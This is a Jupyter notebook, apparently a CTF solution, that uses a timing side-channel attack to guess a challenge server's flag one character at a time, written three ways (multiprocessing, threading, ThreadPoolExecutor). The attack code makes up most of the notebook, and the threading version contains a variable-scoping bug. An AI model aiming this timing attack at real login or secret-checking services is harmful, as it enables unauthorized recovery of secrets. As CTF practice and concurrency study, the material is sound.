<a href="https://colab.research.google.com/github/Khaimin6/CTF_solution/blob/main/07_slow.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# 07 Slow - OMG, It's slow.

- somehow as a learning note for multiprocessing, threading and ThreadPoolExecutor

## Test run

In [ ]:
!apt install -y ncat

In [ ]:
!ncat ctf.hackme.quest 7708

Tips: flag has no lowercase or space, and should match this regex: FLAG\{[0-9A-Z_]+\}
What is your flag? FLAG{ABCD}
Bye

^C


## Using Multithreading

- required shared variable (mp.Array / mp.Variable)
- function return value is ignored
- Instead, passing result to shared variable

In [ ]:
import socket
import time

def netcat(hostname, port, content, last_done, flag):
    c = content.encode('ascii')

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    s.sendall(c)
    s.shutdown(socket.SHUT_WR)
    start_time = time.time()

    while 1:
        data = s.recv(128)
        if len(data) == 0:
            break
        # print("Received:", repr(data))

    end_time = time.time()
    connection_time = end_time - start_time

    if connection_time > last_done.value:
      last_done.value = connection_time
      flag.value = c

    s.close()


h:short, i:int, d:double

In [ ]:
import multiprocessing as mp

curr_data = "FLAG{"
char_set = "_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ}"

send_content = lambda *data: netcat("ctf.hackme.quest", 7708, *data)

# required to declare shared variable
flag = mp.Array('c', 40)


def try_char():
    last_done = mp.Value("d", 0.0)

    workers = [mp.Process(target=send_content, args=(curr_data + i, last_done, flag)) for i in char_set]

    for p in workers:
        p.daemon = True
        p.start()

    for p in workers:
        p.join()

    global curr_data
    curr_data = flag.value.decode('ascii')
    print(curr_data)


In [ ]:
try_char()

In [ ]:
for i in range(10): try_char()

In [ ]:
flag[:]

b''

## Using Threading

- allow direct use of variable with similar usage

In [ ]:
import socket
import time

def netcat_th(hostname, port, content, last_done, flag):
    c = content.encode('ascii')

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    s.sendall(c)
    s.shutdown(socket.SHUT_WR)
    start_time = time.time()

    while 1:
        data = s.recv(128)
        if len(data) == 0:
            break
        # print("Received:", repr(data))

    end_time = time.time()
    connection_time = end_time - start_time

    if connection_time > last_done:
      print(c)
      last_done = connection_time
      flag = c

    s.close()


In [ ]:
import threading as th

curr_data = "FLAG{"
char_set = "_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ}"

send_content_th = lambda *data: netcat_th("ctf.hackme.quest", 7708, *data)
flag = b''


def try_char_th():
    last_done = 0.0

    workers = [th.Thread(target=send_content_th, args=(curr_data + i, last_done, flag)) for i in char_set]

    for p in workers:
        p.start()

    for p in workers:
        p.join()

    global curr_data
    curr_data = flag.decode('ascii')


In [ ]:
try_char_th()

## Using ThreadPoolExecutor

- utilize return value for simplicity

In [ ]:
import socket
import time

def netcat_exc(hostname, port, content, flag):
    c = content.encode('ascii')

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    s.sendall(c)
    s.shutdown(socket.SHUT_WR)
    # s.setblocking(0)

    start_time = time.time()
    while s.recv(128): pass  # proceed when receive null string (end message)
    end_time = time.time()
    connection_time = end_time - start_time

    s.close()

    return content, connection_time

In [ ]:
from concurrent.futures import ThreadPoolExecutor, as_completed

curr_data = "FLAG{"
char_set = "_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ}"

send_content_exc = lambda *data: netcat_exc("ctf.hackme.quest", 7708, *data)
flag = b''

with ThreadPoolExecutor(max_workers=40) as exc:

  for _ in range(20):

    future_map = tuple(exc.submit(send_content_exc, curr_data + i, flag) for i in char_set)

    result = dict(_future.result() for _future in as_completed(future_map))

    curr_data = max(result, key=result.get)
    print(curr_data)
